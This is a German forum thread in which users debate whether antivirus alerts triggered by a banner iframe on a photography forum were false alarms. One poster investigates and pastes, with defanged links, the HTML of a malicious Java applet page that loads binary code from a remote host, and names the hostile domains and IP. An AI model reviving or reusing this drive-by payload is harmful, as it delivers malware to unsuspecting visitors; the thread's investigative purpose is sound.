Virus Alert bei Bannerwerbung

[Siko]

Die gibt es für das gesamte INet nicht,weder hier noch auf irgend einer anderen Seite.
Wenn Du so eine Angst vor Viren und ähnlichem hast dann wäre es das Beste Dein INet ganz abzustellen.
Es wurde hier jetzt mehrfach darauf hingewiesen das es ein Fehlalarm von Avira war und was Rüdiger unternommen hat.
Was Bitte soll Rüdiger noch tun
Ich finde es auch zweifelhaft jetzt jeden Virus,Trojaner usw. auf das DSLR Forum zurück zu führen
Ich bin jeden Tag hier habe Gdata IS 2012 und keinen Alarm gehabt,durch die Hysterie hier habe ich mein System mit einer Boot CD gescannt,wie zu erwarten war kein Befund
Bei einem Freund mit Bit Defender ebenfalls keine Warnung und kein Befund.
mfg Michael
PS: Ich meine Rüdiger und Thomas haben genau richtig gehandelt .

Was das mit Angst du tun hat verstehe ich nicht. Ich bin selbst nicht betroffen und dennoch macht man sich Gedanken wenn man die letzten Seiten hier liest. Zudem kommt ja noch die krass hohe Dunkelziffer von den 15.000 die online waren, die wahrscheinlich gar nicht daran denken würden ihren Befall auf das Forum zurückzuführen.

 

[Torsten_HB]

Was das mit Angst du tun hat verstehe ich nicht. Ich bin selbst nicht betroffen und dennoch macht man sich Gedanken wenn man die letzten Seiten hier liest. Zudem kommt ja noch die krass hohe Dunkelziffer von den 15.000 die online waren, die wahrscheinlich gar nicht daran denken würden ihren Befall auf das Forum zurückzuführen.

Ich gehöre zu den 15.000 und meine PCs wurde nicht befallen. Und nun?

 

[Siko]

Ich gehöre zu den 15.000 und meine PCs wurde nicht befallen. Und nun?

Ich auch. Na dann sind sicher alle anderen auch nicht betroffen und der Thread kann geschlossen werden

klick

 

['Ingo]

Osama ist auch nicht tot und wird irgendwo noch verhört^^

 

[Bildermichel]

Mir steht ein Wochenende ins Haus, an welchem ich nun meinen Rechner neu aufsetzen werde - das kostet alles wieder Stunden!

Jetzt weist Du wozu es Backupprogramme gibt,mein gesamtes System kann ich,im Fall der Fälle, in 10 Minuten aus einem Image wieder Herstellen.
So etwas sollte Pflicht sein wenn man sich im INet bewegt
Es gibt keine absolute Sicherheit,Nirgends.
mfg Michael

 

[scorpio]

Zudem kommt ja noch die krass hohe Dunkelziffer von den 15.000 die online waren, die wahrscheinlich gar nicht daran denken würden ihren Befall auf das Forum zurückzuführen.

Jetzt mach mal langsam halblang, bitte. Vom Board wurde kein einziger Rechner infiziert. Es wurden Seiten ausgeliefert, die im Browsercache dazu führten, dass die Scanner von Avira und Kaspersky (die auf denselben Definitionspool zurückgreifen) anschlugen. Dass das ein Fehlalarm war, wurde von Avira bereits bestätigt.

Bitte hör auf so zu schreiben, als wäre das Board eine Malware-Schleuder.

 

[Bildermichel]

Bitte hör auf so zu schreiben, als wäre das Board eine Malware-Schleuder.

Das wäre ein guter Zeitpunkt hier zu zumachen
mfg Michael

 

[eifelthommy]

Ich möchte noch einmal betonen, dass ich es schön fände, wenn es keine weiteren Anschuldigungen gäbe, sondern gemeinsam sachlich nach Ursachen gesucht würde.

Nach den bisherigen Erkenntnissen wurde weder etwas auf Nutzerseite beschädigt, Dateien des Nutzers infiziert, noch irgendwelche Daten, auch nicht von den Servern des Boards ausgespäht. Von einigen Virenscannern wurden die Seiten des Boards geblockt, weil eine Seite, auf die per Iframe verwiesen wurde, als mit dem "HTML/Infected.WebPage.Gen2" infiziert eingestuft wurde, was nach Untersuchung des Avira-Labs aber ein Fehlalarm war.

Aber mehr als verdächtig ist doch, dass ein IFrame im Board aufgetaucht ist, das zum einen niemand dort abgelegt hat und zum anderen auch noch von Avira als Virus erkannt wurde. Dass Avira nach derzeitigem Kenntnisstand darin keine Gefahr mehr erkennt kann auch bedeuten, dass sie einfach noch nicht erkannt ist.

Vor ca. 10 Jahren versicherte mir ein guter Freund und sehr fähiger Informatiker, dass sich über mp3-Dateien oder Videoclips keine Viren verbreiten können. Heute weiß ich, dass es bei Viren genau darum geht: Für unmöglich gehaltenes möglich zu machen.

Ich halte es für äußerst unwahrscheinlich, dass es einem Zusammenhang gibt, der lediglich bei einem oder zwei Nutzern von mehr als 15.000 an jenem Tag aufgetreten ist. Wenn es einen gäbe, so sollten jetzt, nachdem die Kennung des von Dir erkannten Virus in der Definitionsdatei ist, einige Betroffene mehr finden, bei denen der Scanner anschlägt.

Ich glaube, dass genau das ein Denkfehler ist: Die Geschichte im Forum könnte lediglich eine Pforte geöffnet haben - was dann nachgeladen wird, steht auf einem ganz anderen Blatt. Außerdem ist das Alternierende eine zentrale Eigenschaft "guter" Viren. Dass die Datei auf anderen Rechnern erkannt wird, ist dann nicht gesagt.

Was bitte sollen wir denn noch machen?

Ich weiß es nicht. Ich administriere kein Forum und meine Programmierkenntnisse halten sich arg in Grenzen. Aber vBulletin sollte es wissen - und da sollte man mit penetrant nachhaken!

Ich gehöre zu den 15.000 und meine PCs wurde nicht befallen. Und nun?

1) Woher nimmst du die Gewissheit?
2) 15000 User? Wohl eher 15000 Zugriffe...aus der ganzen Welt...von unterschiedlichsten Systemen, Nutzern, Bots...mit und ohne Scanner, mit und ohne Avira.

Die Fragen sind:
- Wer greift zu?
- Wer hat eine entsprechende Sicherheitslücke auf seinem System?
- Wer sieht das Problem im Board und nicht woanders?
- Wer schaut daraufhin hier ins Supportforum?
- Wer meldet das den Admins bzw. schreibt von seinem Problem hier?
- Wer erkennt überhaupt, dass er sich hier etwas eingefangen hat?

Hier noch einmal die Analyse des Trojaners:

Nur 2 (!) Scanner beurteilen die Datei überhaupt als verdächtig und nur 1 Scanner macht die definitve Aussage, dass es sich um Malware handelt! Ich habe gute kleine Tools, die definitv keine Malware sind und trotzdem von mehr Scannern als Malware falsch erkannt werden als dieser Trojaner! Wenn man solche Erfahrungen macht, hört man auf Virenscannern uneingeschränktes Vertrauen zu schenken.

Jetzt weist Du wozu es Backupprogramme gibt,mein gesamtes System kann ich,im Fall der Fälle, in 10 Minuten aus einem Image wieder Herstellen.

Glückwunsch - aber damit gebe ich mich nicht zufrieden. Da ich mein System nicht routinemäßig jeden Freitag wiederherstelle, werde ich mir jetzt erst mal ein BartPE-CD brennen, mir Tools suchen, mithilfe derer ich den MBR neu schreibe ohne meine Daten-Partitionen zu zerstören und wenn ich mir "100%" sicher bin, dass alles blitzeblank ist, werde ich mein Backup zurückspielen. Das kostet Zeit und Nerven.

Das wäre ein guter Zeitpunkt hier zu zumachen

Threads die mich nicht interessieren ignoriere ich einfach

Gruß
thommy

 

[scorpio]

2) 15000 User? Wohl eher 15000 Zugriffe.

Nein. Zugriffe waren es 9,9 Millionen auf 2,1 Millionen Seiten bei einem Datenvolumen von 92 GB.

 

[Torsten_HB]

Woher nimmst du die Gewissheit?

Ich verwende mehrere Tools, verlasse mich nicht auf einen Anbieter. Zudem verwende ich grundsätzlich keine Mainstream-Browser und unterdrücke alles, was nicht von der angewählten Seite kommt.

 

[Thunderclap]

Ich glaube, dass genau das ein Denkfehler ist: Die Geschichte im Forum könnte lediglich eine Pforte geöffnet haben - was dann nachgeladen wird, steht auf einem ganz anderen Blatt. Außerdem ist das Alternierende eine zentrale Eigenschaft "guter" Viren. Dass die Datei auf anderen Rechnern erkannt wird, ist dann nicht gesagt.

Das ist es ja:
Der Iframe hat GAR NICHTS nachgeladen...

Ich habe (wie weiter oben schon erwähnt) die URL des Iframes tausende von malen mit unzähligen verschiedenen Browser-IDs und Versionsnummern aufgerufen (automatisiert)... mehr als ein Tracking-Cookie kam nie an! Nichts was irgendwie Code enthalten könnte o.ä.

Und was das "alternierende" angeht:
Wer System mit Trojanern infiziert hat in der Regel ein wirtschafliches Interesse (Spamversand, Botnetze aufbauen, etc).... völlig verschiedene Malware zu verteilen wäre also irgendwie ziemlich ungewöhnlich...

 

[Gast_99693]

Ich habe (wie weiter oben schon erwähnt) die URL des Iframes tausende von malen mit unzähligen verschiedenen Browser-IDs und Versionsnummern aufgerufen (automatisiert)

Hast Du die URL, die im HTML-Quelltext angegeben war, getestet? Bei mir hat sich Norton Internet Security nämlich stattdessen über die URL freefrag.ipq.co/enc/jv.html beschwert ("Web Attack: Malicious Java Activity 5"), vielleicht kannst Du die ja evtl. auch mal testen. Ich weiß jetzt nicht, wie die andere URL entstanden ist (evtl. durch Weiterleitung), aber die NIS-Meldung kam definitiv genau beim Aufruf der Foren-Startseite, und Browser-Cache und History waren zu diesem Zeitpunkt komplett leer.

Übrigens hat NIS gestern immer noch über diese URL gemeckert. Und einige Online-Checker (TrendMicro z.B.) schlagen auch an ("Malware").

 

[Thunderclap]

Hast Du die URL, die im HTML-Quelltext angegeben war, getestet? Bei mir hat sich Norton Internet Security nämlich stattdessen über die URL freefrag.ipq.co/enc/jv.html beschwert ("Web Attack: Malicious Java Activity 5")

Ok... jetzt wird es interessant...

Hier passiert tatsächlich etwas... und es kommt vom selben Host wie der iframe...

Von der Url kommt folgendes:

<html>
<head>
        <title>simple page</title>
</head>
<body>
<applet codebase="file:C:\Prog*** Files\java\jre6\lib\ext" code="h**p://1161846587" URL="h**p://s3.harrenmediagroup.com/load.php?2" stats="h**p://s3.harrenmediagroup.com/stats.php"/>
</body>
</html>

(keine Angst hier eingebettet wird nichts nachgeladen... hab die URLS mit * noch unschädlich gemacht)

Das ganze hat nur Auswirkungen auf englische Windows-installationen (Program Files!)

die URL in diesem Code wiederum läd Binärcode nach!
Dieser enthält unter anderem den Part

#CloseHandle=CreateFileA▒ExitProcesskernel32.dll

Ich analysier das ganze später weiter... muss jetzt aber weg...

Es sieht so aus als wäre unter bestimmten Umständen tatsächlich ein Exploit ausgeführt worden!!!!

Und: Ich hab das ganze wirklich vom selben Server gezogen der den Iframe ausgeliefert hat!!! (der Hostname war mittlerweile ungültig, aber ich hab stttdessen die IP von neulich eingesetzt)

 

[rocky7_de]

Habe gerade eine Mail vom System erhalten, mein Virenwächter hat sofort angeschlagen. Kann mir einer erklären was das ist? wieder etwas ganz harmloses?

 

[Gast_99693]

Es sieht so aus als wäre unter bestimmten Umständen tatsächlich ein Exploit ausgeführt worden!!!!

Versteh ich das richtig, dass das auch nur für Browser mit einem aktiven (verwundbaren?) Java-Plugin gilt?

Habe gerade eine Mail vom System erhalten, mein Virenwächter hat sofort angeschlagen. Kann mir einer erklären was das ist? wieder etwas ganz harmloses?

Ich lach mich schief... da scheint die Heuristik vom Kaspersky-Mailschutz auf den Post von Thunderclap angesprungen zu sein, weil da im CODE-Block HTML enthalten ist, das wie ein Virus Exploit-Skript aussieht ...die Uhrzeit passt auf jeden Fall.

Das ist aber glaube ich wirklich harmlos (aber keine Garantie). Allerdings eventuell auch ein Beleg dafür, dass dieser freefrag-Link wirklich einen Exploit enthält.

 

[eifelthommy]

Thunderbird meckert auch ("Phishing..."). Liegt aber wohl an den Links.

Und was das "alternierende" angeht:
Wer System mit Trojanern infiziert hat in der Regel ein wirtschafliches Interesse (Spamversand, Botnetze aufbauen, etc).... völlig verschiedene Malware zu verteilen wäre also irgendwie ziemlich ungewöhnlich...

Es gibt offenbar genügend Leute, die so was brauchen - Manche Kreaturen zerkratzen Autotüren, andere programmieren Viren.

Gruß
thommy

PS: Ich hoffe, die Thematik wird jetzt hier ein wenig ernster genommen.

 

[Gast_112574]

Das ganze hat nur Auswirkungen auf englische Windows-installationen (Program Files!)

Du bist dir im Klaren darüber, dass Windows7 (ob Vista auch weiß ich nicht) immer mit englischen Pfadbezeichnungen arbeitet und die intern dann in deutsche Verzeichnisnamen umgewandelt werden? Zumindest auf das Verzeichnis Programme trifft das zu, denn bei der Installation werden immer wieder die englischen Pfadnamen "Program Files" angezeigt.
In sofern könne ich mir vorstellen, dass auch neuere deutsche BS davon betroffen sein könnten.

Edit: Oder du machst es gleich so wie ich auf meinem Rechner bei einer Windows7-Installation (siehe Anhang)

 

[IcheBins]

Das ganze hat nur Auswirkungen auf englische Windows-installationen (Program Files!)

Öffne doch mal eine Windows Explorer Instanz, kopiere C:\Program Files\Java\jre6\lib\ext - alternativ C:\Program Files\Windows Sidebar - in die Adresszeile und bestätige per Enter.


Edit: Zu spät.
Im Detail habe ich es nicht analysiert, aber die angezeigten Namen zentraler Windows-Ordner sind mittlerweile (seit Vista?) "nur" noch Label.


Grüße,
IcheBins

 

[Thunderclap]

Stimmt...
(hier aufm Laptop hab ich nur XP, daher hab ich daran nicht gedacht... aber logisch... seit Vista gibts jede Menge Aliases für de Pfade).

ich werd mal sehen ob ich aus dem Exploit mittels Disassembler etwas entlocken kann... (vor allem unter welchen Bedingungen er sich installiert)

 

[Gast_99693]

Übrigens sperrt auch google safebrowsing den Server 69.64.95.59 ("Als attackierend gemeldete Webseite!"), komischerweise aber nur bei direkter Angabe der IP-Adresse. Muss damit zusammenhängen, dass der Name im Iframe über diesen dynamischen DNS-Dienst erzeugt wurde.